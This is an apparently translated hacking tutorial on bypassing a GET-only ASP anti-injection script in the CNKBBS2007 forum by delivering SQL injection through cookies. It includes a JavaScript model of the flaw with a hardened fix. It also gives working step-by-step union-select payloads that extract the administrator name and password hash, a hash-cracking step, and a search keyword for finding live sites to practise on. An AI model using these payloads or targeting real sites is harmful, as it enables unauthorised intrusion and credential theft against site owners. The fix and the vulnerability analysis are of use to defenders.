Nowadays many websites deploy a generic anti-injection script. Does that leave us with no way in? No: we can use cookie injection, and many generic anti-injection scripts are not prepared for it.
Before going into it, let us review the Request object in ASP. In the earlier sections we covered the usual ways of reading client-submitted data, Request.QueryString (GET) and Request.Form (POST). The Request object can also be read without naming a collection, as Request("name"); this is slower and error-prone, because when the collection name is omitted ASP searches the collections in a fixed order: QueryString, Form, Cookies, ClientCertificate and ServerVariables, and returns the first match. The Cookies collection is one of those members, and it holds every cookie the user's browser sent. From the second lecture, "Cookie spoofing intrusion and principles", we know that a cookie is a text value stored on the client and can be modified freely, so we can deliver the value of a variable through Request.Cookies and use it to exploit a vulnerability for injection.
First, let us look at the latest version of the CNKBBS forum, "(CNKBBS2007) network scene Forum 2007 v5.0" (official page: http://www.cnetking.com/websys2.asp?Id=26; the release date is.). After unpacking the source, the file "user_RxMsg_detail.asp" contains the following code:
<!-- #Include file="opendb.asp" -->   (pulls in opendb.asp, the database connection)
<!-- #Include file="char.asp" -->
<%
Call CheckUserLogin(username)
Dim action, s, id
id = Request("id")   (reads the client-supplied value without naming a collection and without filtering it)
If id <> "" Then Call IsNum(bid)   (the programmer's slip: the numeric check runs on bid, not id, so id is never validated)
Conn.Execute("update cnk_Users_RxMsg set readed=1 where id=" & id)   (marks the message as read; id is concatenated straight into the SQL)
Rs.Open "select * from cnk_users_RxMsg where id=" & id, conn, 1, 3   (second unfiltered concatenation)
Open the "opendb.asp" file:
<% Option Explicit
Response.Buffer = True %>
<!-- #Include file="fzr.asp" -->   (pulls in fzr.asp)
<!-- #Include file="cnkdata/dbname.asp" -->
<!-- #Include file="config.asp" -->
..................
So opendb.asp is the file that opens the database connection, and it includes fzr.asp. Open fzr.asp:
<%
'-------- Copyright ------------------
'SQL universal anti-injection program
'Aseanleung
'-------- Definition section ------------------
Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr
Dim fso1, all_tree2, file1, files, filez, fs1, zruserip
If Request.QueryString <> "" Then   (only data in Request.QueryString, i.e. sent by GET, is examined; Form and Cookies are never looked at)
'Customize the strings to be filtered, separated by "|"
Fy_In = "'|;|%|*|and|exec|insert|select|delete|update|count|chr|mid|master|truncate|char|declare|script"   (blacklist of common SQL injection tokens; the first entry is the single quote)
Fy_Inf = Split(Fy_In, "|")
For Each Fy_Get In Request.QueryString
  For Fy_Xh = 0 To UBound(Fy_Inf)
    If InStr(LCase(Request.QueryString(Fy_Get)), Fy_Inf(Fy_Xh)) <> 0 Then
      zruserip = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
      If zruserip = "" Then zruserip = Request.ServerVariables("REMOTE_ADDR")
      Response.Write "The content contains illegal characters! Please do not use 'and', 'or' or similar characters. Remove them and submit again!!<br>"
      Response.Write "If you are trying to attack this website, the system has recorded your operation<br>"
      Response.Write "Operation IP: " & zruserip & "<br>"
      Response.Write "Operation time: " & Now & "<br>"
      Response.Write "Operation page: " & Request.ServerVariables("URL") & "<br>"
      Response.Write "Submission method: GET<br>"
      Response.Write "Submitted parameter: " & Fy_Get & "<br>"
      Response.Write "Submitted data: " & Request.QueryString(Fy_Get)
......................
This is clearly the generic SQL anti-injection script (the notes in parentheses above explain the code). One aside a practitioner will notice: it records HTTP_X_FORWARDED_FOR in preference to REMOTE_ADDR, and that header is supplied by the client, so the "attacker IP" it logs can be whatever the attacker chooses to send.
Having read the code, the picture is this. Because of the programmer's slip, id is never validated and is then concatenated into two SQL statements; that is the injection vulnerability. The forum does include an anti-injection script to stop the common SQL keywords, but that script only inspects data sent by GET (Request.QueryString) and ignores every other channel. Since the page reads the value with Request("id") and not Request.QueryString("id"), a request that carries no id in the query string makes ASP fall through to the Cookies collection, so we can deliver the value in a cookie and bypass the anti-injection script entirely. In summary, the conditions for cookie injection are:
1: The page reads client data with the bare form Request("name"), without naming a collection.
2: The variable is not filtered or validated before it reaches the SQL statement.
3: The anti-injection script places no restriction on Request.Cookies. (At the time of writing, anti-injection program 3.0 only checks the GET and POST channels.)
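To make the bypass concrete, here is a small model of the server-side logic written for this article (it is not CNKBBS's code). It reproduces classic ASP's collection search order for a bare Request("id"), the GET-only blacklist check from fzr.asp, the vulnerable handler as shipped, and the fix a reviewer would ask for. The request objects and the "admin" username are constructed test inputs.

```javascript
// Added example (not CNKBBS's code): model of Request("id") resolution,
// fzr.asp's GET-only blacklist, and the cookie bypass.

// Blacklist copied from fzr.asp, split on "|" exactly as the script does.
const FY_IN = "'|;|%|*|and|exec|insert|select|delete|update|count|chr|mid|master|truncate|char|declare|script";
const FY_INF = FY_IN.split("|");

// Classic ASP: Request("name") with no collection searches QueryString, Form,
// Cookies (then ClientCertificate and ServerVariables) and returns the first hit.
function requestLookup(req, name) {
  for (const coll of ["queryString", "form", "cookies"]) {
    const c = req[coll];
    if (c && Object.prototype.hasOwnProperty.call(c, name)) return c[name];
  }
  return "";
}

// fzr.asp's check: every Request.QueryString value is lower-cased and searched
// for each token. Request.Form and Request.Cookies are never examined.
function fzrBlocks(req) {
  for (const [param, value] of Object.entries(req.queryString || {})) {
    const lower = String(value).toLowerCase();
    const hit = FY_INF.find((tok) => lower.includes(tok));
    if (hit !== undefined) return { blocked: true, param, token: hit };
  }
  return { blocked: false };
}

// user_RxMsg_detail.asp as shipped: IsNum(bid) checks the wrong variable, so
// id is concatenated into the query unchecked.
function vulnerableHandler(req) {
  const check = fzrBlocks(req);
  if (check.blocked) return { blocked: true, sql: null };
  const id = requestLookup(req, "id");
  return { blocked: false, sql: "select * from cnk_users_RxMsg where id=" + id };
}

// Hardened handler: read id from the one collection the page expects and
// require a plain integer. A parameterized ADODB.Command is the longer-term
// fix; the strict numeric check alone closes this hole.
function hardenedHandler(req) {
  const id = (req.queryString && req.queryString.id) || "";
  if (!/^\d{1,9}$/.test(id)) return { rejected: true, sql: null };
  return { rejected: false, sql: "select * from cnk_users_RxMsg where id=" + id };
}

// What the browser sends after javascript:alert(document.cookie="id="+escape(payload)):
// the stored value is escape()-encoded, and classic ASP URL-decodes cookie
// values when Request.Cookies reads them.
function cookieRequest(payload, queryString = {}) {
  const stored = escape(payload); // e.g. "1%20and%201%3D1"
  return { queryString, form: {}, cookies: { id: unescape(stored) }, rawCookie: "id=" + stored };
}

// Constructed demo inputs.
const viaGet = vulnerableHandler({ queryString: { id: "1 and 1=1" } });
const viaCookie = vulnerableHandler(cookieRequest("1 and 1=1", { Username: "admin" }));
const fixed = hardenedHandler(cookieRequest("1 and 1=1", { Username: "admin" }));
console.log("GET blocked:", viaGet.blocked);      // true
console.log("cookie SQL:", viaCookie.sql);        // ... where id=1 and 1=1
console.log("hardened rejects:", fixed.rejected); // true
```

Run with `node` and note the three results together: the same payload is blocked when it arrives as `?id=`, reaches the SQL string untouched when it arrives as a cookie, and is rejected by the hardened handler regardless of channel because that handler never consults the cookie and never accepts a non-integer.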
Now let us look at the cookie injection statement.
Cookie injection statement: javascript:alert(document.cookie="id="+escape("xx and (injection code here)")); where xx is the value that follows id= in the original link (for a link of the form xxx.asp?id=xx).
This uses a little JavaScript. Broken down, the statement means the following:
1: alert() displays a message dialog: a small independent window with a message and a button. (It is frequently used in cross-site scripting as well.)
2: document.cookie: JavaScript exposes the cookies of the current page as the cookie property of the document object, which represents the HTML shown in the browser. Through this string property we can read and create cookie data; reading it is simply alert(document.cookie), and assigning a "name=value" string to it sets a cookie.
3: escape() encodes a string, replacing every character that is not a letter or digit (apart from a few punctuation marks) with a %XX sequence. Normally cookies are sent to the browser by the server in an HTTP response, but with JavaScript we can set one locally. The format is name=value: name is the name of the cookie item and value its string value, and neither may contain a semicolon, a comma or whitespace. A payload such as "50 and 1=1" contains spaces (and a union query contains commas), so it must be passed through escape() first; the server decodes it again when it reads the cookie.
The whole statement therefore sets a cookie named id on the current site to our encoded value. Cookies set this way are held in the browser's memory for the session and are only written to disk when the browser exits, which is why in the steps below we set the cookie and then enter the target URL in the same browser session. Two practical points: the statement must be run while a page from the target site is loaded, because document.cookie binds the cookie to the current host and directory, so a cookie set elsewhere would never be sent to user_RxMsg_detail.asp; and current browsers strip the javascript: prefix from text pasted into the address bar, so type it by hand or run the statement from the developer console instead.
Finally, let us test the procedure:
1: Open the CNKBBS forum set up on the local host and register a user. A short message from the administrator arrives; open its link and note the id parameter in the address.
2: Clear the address bar and enter javascript:alert(document.cookie="id="+escape("<the id value from step 1> and 1=1")); a dialog pops up showing the cookie string.
3: Enter http://127.0.0.1/cnkbbs5.2_ac/user_RxMsg_detail.asp?Username=forum administrator (note that there is no id in the query string). The normal page is returned, which means the anti-injection script was bypassed and the page took id from our cookie.
4: Enter javascript:alert(document.cookie="id="+escape("1 and 1=2")); then enter http://127.0.0.1/cnkbbs5.2_ac/user_RxMsg_detail.asp?Username=forum administrator again. This time the time and content are not displayed, so the condition is being evaluated in SQL and the page is injectable.
5: Looking at the system database, the cnk_users_RxMsg table has eight fields, and the Cnk_Admin table stores administrator information in the AdminName and AdminPassword fields. We use a union query: enter javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,2,3,4,5,6,7,8 from Cnk_Admin")); then clear the address bar and enter http://127.0.0.1/cnkbbs5.2_ac/user_RxMsg_detail.asp. The numbers 4 and 5 are displayed on the page, so those two positions are rendered.
6: Clear the address bar again and enter javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,2,3,AdminName,AdminPassword,6,7,8 from Cnk_Admin")); after that, enter http://127.0.0.1/cnkbbs5.2_ac/user_RxMsg_detail.asp?Username=forum administrator, and the administrator's account and password appear on the page.
7: Querying the obtained password hash on the http://www.cmd5.com site gives the plaintext administrator password admin, and we can log in to the back end from the site's home page. The keyword "Powered by CNKBBS2007 (5.2)" finds other sites running this system on the Internet (not many); use them to practise manual injection, and do not damage them. Note that this kind of injection needs two manual steps for every probe, which is error-prone, so work carefully.